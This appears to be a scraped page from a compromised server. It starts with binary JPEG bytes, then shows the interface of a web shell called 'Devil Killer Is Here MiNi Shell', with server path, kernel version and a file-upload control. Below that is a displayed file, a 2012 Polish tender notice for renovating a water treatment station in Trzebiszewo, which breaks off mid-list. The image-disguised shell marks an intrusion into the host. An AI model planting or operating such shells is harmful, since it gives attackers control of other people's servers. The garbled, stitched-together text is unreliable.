JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120713/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120713/250612-N-2012.html

<p class="kh_header"><b>Skwierzyna: Remont  stacji uzdatniania wody w miejscowości Trzebiszewo z wprowadzeniem uzdatnienia wody podawanej   do wodociągu publicznego</b><br>
<b>Numer ogłoszenia: 250612 - 2012; data zamieszczenia: 13.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> nieobowiązkowe</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Wodociągów i Kanalizacji spółka z o.o. , ul. Chrobrego 5, 66-440 Skwierzyna, woj. lubuskie, tel. 0-95 7172027, faks 0-95 7171541.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zwik.skwierzyna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka z o.o. z 100% udziałem Gminy..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont  stacji uzdatniania wody w miejscowości Trzebiszewo z wprowadzeniem uzdatnienia wody podawanej   do wodociągu publicznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Remont  stacji uzdatniania wody w miejscowości Trzebiszewo z wprowadzeniem uzdatnienia wody podawanej   do wodociągu publicznego. 
1. Ogólny zakres rzeczowy przedsięwzięcia:
W ogólny zakres rzeczowy przedsięwzięcia wchodzi wykonanie robót budowlanych i montażowych w następującym zakresie:
a)    Remont budynku SUW:
- wymiana pokrycia dachowego-płyty azbesto-cementowe wymienione na płyty warstwowe,  
   trapezowe  powlekane w kolorze brązowym; utylizacja płyt azbesto-cementowych;
- wymiana obudowy ścian osłonowych (płyty azbesto-cementowe + wełna mineralna wymienione na 
  obudowę z bloczków z betonu komórkowego); utylizacja płyt azbesto-cementowych.
- remont posadzki w budynku (wykonanie posadzki z płytek (gres techniczny antypoślizgowy , cokoliki 
  wyokrąglone) ,
- wymiana okien na okna PVC w kolorze brązowym, 
- wymiana drzwi zewnętrznych dwuskrzydłowych wykonanych z kształtowników 
  stalowych pokrytych blachą malowanych na kolor brązowy na drzwi dwuskrzydłowe z PVC w kolorze 
  brązowym, 
- remont wentylacji ( wymiana kominków wywiewnych i wentylatora nawiewnego),
- remont kanału technicznego,
- wymiana rynien i rur spustowych oraz opierzeń,
- wykonanie tynków wewnętrznych ścian ( wyłożenie ścian do wysokości 2,20 m płytkami szkliwionymi 
   łatwo zmywalnymi o gładkiej nawierzchni , kolor jasny, powyżej malowany farbą emulsyjną).

b)  Ocieplenie budynku SUW
- ocieplenie ścian zewnętrznych styropianem grubości 12 cm, metodą lekką - mokrą, pokrycie tynkiem  
    akrylowym strukturalnym,  barwionym w całej  masie w kolorze blady pomarańcz.

c) Utwardzenie terenu SUW
- utwardzenie terenu kostką betonową typu POLBRUK , gr. 8 cm, na podbudowie zasadniczej z  
   kruszywa łamanego;

d) Wymiana ogrodzenia terenu SUW
- rozbiórka istniejącego ogrodzenia z siatki metalowej na słupkach betonowych
- montaż ogrodzenia z siatki metalowej ocynkowanej na słupkach stalowych (lokalizację zaznaczono na   
  mapie kolorem żółtym),

e) Remont instalacji i urządzeń w  stacji uzdatniania wody, w tym:
e.1) remont studni głębinowych Nr 1z i Nr 2,  każdej  studni w zakresie: 
 - demontaż istniejącej pompy głębinowej wraz z armaturą zaporowo-zwrotną, tj.: pompy 
   głębinowej, rury  tłocznej pompy, zaworu zwrotnego, przepustnicy międzykołnierzowej, 
   głowicy studziennej i innych elementów jak kształtki, kolana, tuleje i 
   montaż w to miejsce nowej pompy głębinowej wraz z armaturą zaporowo-zwrotną, tj. 
   pompy głębinowej, rury tłocznej pompy, zaworu zwrotnego, przepustnicy 
   międzykołnierzowej, zaworu zwrotnego, głowicy studziennej i innych elementów jak 
   kształtki, kolana, tuleje;
- demontaż rury wywiewnej i montaż nowej rury wywiewnej;
- remont szybu obudowy, tj. naprawa ubytków w tynku , malowanie farbą emulsyjną;
- remont drabinki stalowej i włazu - oczyszczenie i malowanie farbą olejną;
e.2) w budynku stacji uzdatniania wody:
- demontaż wszystkich urządzeń i instalacji stacji uzdatniania wody wraz z armaturą  
   zaporową, zwrotna i  pomiarową, tj. m.in.: zbiorników filtrów ciśnieniowych O 1200 mm - 2 szt;,  
   zbiornika wody czystej, aspiratora powietrza, dozownika podchlorynu i innej armatury jak 
   pompy, zawory, dmuchawy, przepustnice, urządzeń do  pomiaru ilości wody surowej i 
   uzdatnionej, manometrów, odpowietrzników, wziernika wód popłucznych, punktów poboru 
   wody, demontaż instalacji sanitarnej, elektrycznej wraz z rozdzielnią elektryczną, 
   oświetleniem i wentylatorem wyciągowym i montaż w to miejsce nowych urządzeń i 
   instalacji uzdatniania wody wraz z armaturą zaporową, zwrotna i  pomiarową, tj. m.in.:
   zbiorników filtrów ciśnieniowych O 1200 mm - 2 szt;, zbiornika wody czystej, aspiratora 
   powietrza, dozownika podchlorynu i innej armatury jak  pompy, zawory, dmuchawy, 
   przepustnice, urządzeń do  pomiaru ilości wody surowej i uzdatnionej, manometrów, 
   odpowietrzników, wziernika wód popłucznych, punktów poboru wody, montaż instalacji 
   sanitarnej, elektrycznej wraz z rozdzielnią elektryczną, oświetleniem i wentylatorem 
   wyciągowym.
e.3) remont istniejącego odstojnika wód popłucznych, naprawa ubytków wewnątrz zbiornika, 
      oczyszczenie. 

f) Dane ogólne budynku:
 - długość - 12,44 m
- szerokość - 4,98 m
- wysokość budynku w kalenicy - 4,12 m
- wysokość górnej krawędzi elewacji ( do okapu) - 3,03 m
- powierzchnia zabudowy - 61,95 m2
- powierzchnia użytkowa - 49,93 m2
- ilość pomieszczeń - 1
- wysokość pomieszczeń - 2,8-3,5 m
- kubatura - 220 m3

2. Wykonawca w ramach Zadania Inwestycyjnego zobowiązany jest również do wykonania Zadań  
    Towarzyszących:
1)	rozruchu technologicznego stacji,
2)	opracowania niezbędnej instrukcji (eksploatacji, stanowiskowych, bhp),
3)	wykonania niezbędnych analiz wody w zakresie monitoringu przeglądowego przez akredytowane  laboratorium potwierdzające spełnienie wymogów jakości wody przeznaczonej do spożycia przez ludzi wynikających z rozporządzenia Ministra Zdrowia z dnia 29 marca 2007 r.
4)	wykonanie analizy wód popłucznych przez akredytowane laboratorium.
5)	wykonania dokumentacji powykonawczej.

3. Szczegółowy zakres rzeczowy przedsięwzięcia określony jest w dokumentacji technicznej:
1.	projekcie budowlanym wykonawczym, z częścią opisową, mapami i rysunkami do projektu wykonawczego branża sanitarna, branża budowlana, branża elektryczna,
2.	przedmiarze robót, 
3.	kosztorysie nakładczym branża budowlana,
4.	 kosztorysie nakładczym branża instalacyjna, 
5.	kosztorysem nakładczym - wymiana ogrodzenia,
6.	kosztorysem nakładczym - droga wewnętrzna z chodnikiem 
7.	specyfikacji technicznej wykonania i odbioru Robót Budowlanych,
8.	projekcie umowy. 
Stanowią one załączniki do SIWZ.

4.0. Wymagania Zamawiającego w stosunku do przedmiotu zamówienia.
4.1  Zamawiający wymaga, aby każde z urządzeń było wyprodukowane w całości przez jednego producenta (nie dopuszcza się samodzielnego montażu urządzeń z podzespołów przez Wykonawcę robót na etapie modernizacji SUW). 
Nie dopuszcza się zastosowania urządzeń prototypowych i testowanych.

5. Przepisy prawne związane z przedmiotem zamówienia w rozdziale III pkt 5 SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 45.33.00.00-9, 45.31.00.00-3, 45.40.00.00-1, 45.25.21.20-5, 45.23.00.00-8, 45.23.10.00-5, 45.23.24.30-5, 45.34.00.00-2, 45.34.20.00-6, 45.23.32.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Informacje na temat wadium zamieszczone w rozdziale X SIWZ. 
1.Oferta musi być zabezpieczona wadium w wysokości 10.000,00 zł (słownie: dziesięć tysięcy  złotych 00/100).
2.Wadium musi obejmować okres związania ofertą: 30 dni (bieg terminu związania ofertą rozpoczyna się wraz z upływem terminu składania ofert).

UWAGA: Przedłużenie terminu składania ofert spowoduje, że wszelkie prawa i zobowiązania Zamawiającego i Wykonawcy odnośnie ww. ustalenia będą podlegały - odpowiednio - nowym terminom. 

3.Termin wniesienia wadium upływa wraz z terminem składania ofert, o godzinie wyznaczonej na składanie ofert. 
4. Wykonawca, który nie wniesie wadium w wymaganym terminie, w tym również na przedłużony okres związania ofertą, lub nie zgodzi się na przedłużenie okresu związania ofertą zostanie przez Zamawiającego wykluczony z ubiegania się o udzielenie zamówienia publicznego.
5. Wadium można wnieść w formie:
a)pieniężnej,
b)poręczeniach bankowych,
c)gwarancji bankowej,
d)gwarancji ubezpieczeniowej,
e)poręczenia bankowego,
f) poręczeń udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2     
    ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju   
    Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 
    732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).

Wadium w formach wymienionych w ppkt b-f musi być wystawione na: Zakład Wodociągów i Kanalizacji Sp. z o.o. w Skwierzynie , ul. Chrobrego 5, 66-440 Skwierzyna , z zapisem : Wadium do przetargu nieograniczonego - Remont  stacji uzdatniania wody w miejscowości Trzebiszewo z wprowadzeniem uzdatnienia wody podawanej do wodociągu publicznego.
Oryginał i kopię wadium trzeba dołączyć do oferty.

6.Wadium wnoszone w formie pieniężnej należy wpłacić na rachunek bankowy Zamawiającego nr 22 1240 3594 1111 0010 0974 6098 Bank PKO SA I Oddział w  Skwierzynie z dopiskiem: Wadium do przetargu nieograniczonego - Remont stacji uzdatniania wody w miejscowości Trzebiszewo z wprowadzeniem uzdatnienia wody podawanej do wodociągu publicznego.
7.Wadium należy wnieść przed terminem składania ofert. W przypadku wnoszenia wadium w formie pieniężnej, za termin jego wniesienia zostanie przyjęty termin uznania rachunku bankowego Zamawiającego (tj. data faktycznego wpływu środków pieniężnych na konto Zamawiającego). 
8.W przypadku wnoszenia wadium w formie gwarancji bankowych lub ubezpieczeniowych beneficjentem gwarancji jest Zamawiający. Umowa gwarancyjna zawarta pomiędzy Gwarantem a Wykonawcą winna określać gwarancję jako nieodwołalną i bezwarunkową w odniesieniu do prawa Zamawiającego do egzekwowania należności bez zwłoki (tzn. na każde pisemne żądanie Zamawiającego nieodwołalnie i bezwarunkowo). 
9. Egzekwowanie w/w należności dotyczy następujących przypadków: 
- odmowy przez oferenta do podpisania umowy na warunkach określonych w ofercie,
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
10.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego 
    oferta została wybrana:
-odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach 
 określonych w ofercie;
-nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
-zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn 
 leżących po   stronie wykonawcy. 
11.Termin ważności gwarancji stanowiących wadium musi się pokrywać z terminem 
     związania ofertą. 
12. W przypadku wnoszenia wadium w formie poręczenia bankowego niezbędne jest 
     zawarcie umowy pisemnej pomiędzy Poręczycielem, a osobą, na rzecz której 
     poręczenie zostało złożone (tzn. Zamawiającego). Poręczenie dotyczy wypłaty 
     dla  Zamawiającego kwoty wadium nieodwołalnie i bezwarunkowo, na pierwsze  
     pisemne żądanie Zamawiającego odnoszące się do:
-uchylania się Oferenta od podpisania umowy na warunkach określonych w ofercie,
-zawarcie umowy stało się niemożliwe z winy Oferenta.
Termin ważności poręczenia bankowego stanowiącego wadium musi się pokrywać  z terminem związania  ofertą. 
13.W przypadku wnoszenia wadium w poręczeniach udzielanych przez podmioty, o których mowa w art. 6 ust. 3 pkt. 4 lit. b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości, podmiot potwierdza wartość poręczenia, co najmniej do wielkości ustalonego wadium. Poręczenie winno być ważne co najmniej do dnia związania ofertą. 
14.Oryginał dokumentu wadium wnoszonego w formie: poręczenia bankowego, gwarancji bankowej lub ubezpieczeniowej lub w poręczeniach, o których w pkt. 9  należy zdeponować za potwierdzeniem odbioru w siedzibie Zamawiającego, w kasie, przed upływem terminu wyznaczonego na składanie ofert, zaś kserokopię dowodu wniesienia wadium (potwierdzoną za zgodność z oryginałem) dołączyć do oferty.
15.Wykonawca, który nie złożył wadium w dopuszczonej w niniejszej SIWZ formie i  
    terminie zostanie z postępowania wykluczony.
16. Informacje na temat zwrotu wadium zamieszczono w rozdziale X.2.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunki udziału w postępowaniu  określone zostały na podstawie art. 22 ust. 1 pzp. 
 
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1.posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli  
   ustawy nakładają obowiązek posiadania takich uprawnień;
2.posiadają niezbędną wiedzę i doświadczenie;
3.dysponują potencjałem technicznym i osobami zdolnymi do wy?konania zamówienia;
4.znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie 
  zamówienia;
5.nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie 
   art. 24 pzp. oraz spełnią warunki podane w Specyfikacji Istotnych Warunków   
   Zamówienia. 
5.1.złożą Oświadczenie, że wykonawca spełnia warunki określone w art. 22 ust. 1 
     pzp. oraz nie podlega  wykluczeniu na podstawie art. 24 pzp. - na formularzu 
     ofertowym /zał. Nr 2 i 3 SIWZ/. 
5.2. Spełnią pozostałe warunki wynikające z rozdziału VII SIWZ. - Informacje o 
      oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu 
      potwierdzenia spełnienia wymaganych warunków udziału w postępowaniu 
   określone zostały w rozdziale VIII SIWZ. 
- Ocena spełnienia warunków wymaganych od oferentów zostanie dokonana wg formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem wykonawcy. Na potwierdzenie warunków, o których mowa powyżej, Wykonawca musi przedłożyć dokumenty wymienione w Rozdziale VIII SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy wykażą i udokumentują (referencjami, opiniami lub listami polecającymi, protokołami odbioru końcowego), iż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w ciągu całego okresu prowadzenia działalności wykonali roboty budowlane w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, przez co należy rozumieć wykonanie trzech zadań tj. remont, budowa lub rozbudowa stacji  uzdatniania wody o wydajności układu technologicznego nie mniejszej niż 15 m3/h.  Ocena spełniania 
warunku będzie dokonana na podstawie złożonego wykazu wykonanych robót budowlanych i dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone; na zasadzie spełnia-nie spełnia. Wykaz wykonanych prac sporządzony według formularza stanowiącego załącznik nr 4 do niniejszej SIWZ. 
Wykonawca może polegać na wiedzy i doświadczeniu innego lub innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunku. W takiej      sytuacji wykonawca zobowiązany będzie udowodnić, iż będzie dysponował wiedzą i doświadczeniem niezbędnym do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie i niezbędne dokumenty tych podmiotów do oddania do dyspozycji prawo korzystania z ich wiedzy i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia. Poprzez wypełnienie tego warunku należy rozumieć nie tylko dysponowanie dokumentami potwierdzającymi wiedzę i doświadczenia, ale przede wszystkim udział tego podmiotu w realizacji zamówienia, a przynajmniej oddanie do dyspozycji wykonawcy co najmniej niezbędnej kadry kierowania budową posiadającej wymagane uprawnienia oraz doświadczenie oraz zobowiązanie do stałej usługi doradztwa w zakresie wykonywania przedmiotu zamówienia). Jeżeli wykonawca wykazując spełnianie ww. warunku polegać będzie na zasobach innych podmiotów, zobowiązany jest do wykazania za pomocą dokumentów wymienionych w ogłoszeniu, że w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 ustawy Pzp.
Spełnią pozostałe warunki wynikające z rozdziału VII SIWZ. - Informacje o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia wymaganych warunków udziału w postępowaniu określone zostały w rozdziale VIII SIWZ. 
- Ocena spełnienia warunków wymaganych od oferentów zostanie dokonana wg formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem wykonawcy. Na potwierdzenie warunków, o których mowa powyżej, Wykonawca musi przedłożyć dokumenty wymienione w Rozdziale VIII SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Jeżeli wykonawca wykaże i udokumentuje swoją wiedzę i doświadczenie w sposób określony w pkt III.3.2. ogłoszenia , zamawiający uzna, że potwierdził tym iż posiada potencjał techniczny umożliwiający wykonanie zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy dysponują kadrą do kierowania robotami budowlanymi: a) kierownikiem budowy z uprawnieniami do wykonywania samodzielnych funkcji technicznych w budownictwie o specjalności konstrukcyjno - budowlanej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, b) kierownikiem robót z uprawnieniami do wykonywania samodzielnych funkcji w budownictwie o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów, c) kierownikiem robót z uprawnieniami do wykonywania samodzielnych funkcji w budownictwie o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. W przypadku, gdy Wykonawca dysponuje lub będzie dysponował zasobami innego podmiotu w zakresie osób zdolnych do wykonania zamówienia winien wskazać, że w zespole wykonawcy znajdują się osoby, które udostępnia mu inny podmiot. W takiej sytuacji wykonawca zobowiązany będzie udowodnić, iż będzie dysponował zasobami innego podmiotu w zakresie osób zdolnych do wykonania zamówienia, w szczególności przedstawiając pisemne zobowiązanie i niezbędne dokumenty tych podmiotów do oddania do dyspozycji zasobów osobowych na okres wykonywania zamówienia. Poprzez wypełnienie tego warunku należy rozumieć również oddanie do dyspozycji wykonawcy. Jeżeli wykonawca wykazując spełnianie ww. warunku polegać będzie na zasobach innych podmiotów, zobowiązany jest do wykazania za pomocą dokumentów wymienionych w ogłoszeniu, że w stosunku do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 ustawy Pzp. W celu potwierdzenia spełniania niniejszego warunku Wykonawcy zobowiązani są również przedłożyć Personel Wykonawcy - Wykaz osób przewidzianych do wykonania zamówienia sporządzony na formularzu lub według formularza stanowiącego załącznik nr 6 do niniejszej SIWZ oraz  załącznik nr 5 do SIWZ  - Podwykonawcy.
Spełnią pozostałe warunki wynikające z rozdziału VII SIWZ. - Informacje o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia wymaganych warunków udziału w postępowaniu określone zostały w rozdziale VIII SIWZ. 
- Ocena spełnienia warunków wymaganych od oferentów zostanie dokonana wg formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem wykonawcy. Na potwierdzenie warunków, o których mowa powyżej, Wykonawca musi przedłożyć dokumenty wymienione w Rozdziale VIII SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Spełnienie poprzez przedłożenie potwierdzenia ubezpieczenia od odpowiedzialności cywilnej  w  zakresie  prowadzonej    działalności gospodarczej - suma ubezpieczenia minimum 500.000,00zł.
Spełnią pozostałe warunki wynikające z rozdziału VII SIWZ. - Informacje o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia wymaganych warunków udziału w postępowaniu określone zostały w rozdziale VIII SIWZ. 
- Ocena spełnienia warunków wymaganych od oferentów zostanie dokonana wg formuły spełnia - nie spełnia. Nie spełnienie chociażby jednego warunku, skutkować będzie wykluczeniem wykonawcy. Na potwierdzenie warunków, o których mowa powyżej, Wykonawca musi przedłożyć dokumenty wymienione w Rozdziale VIII SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

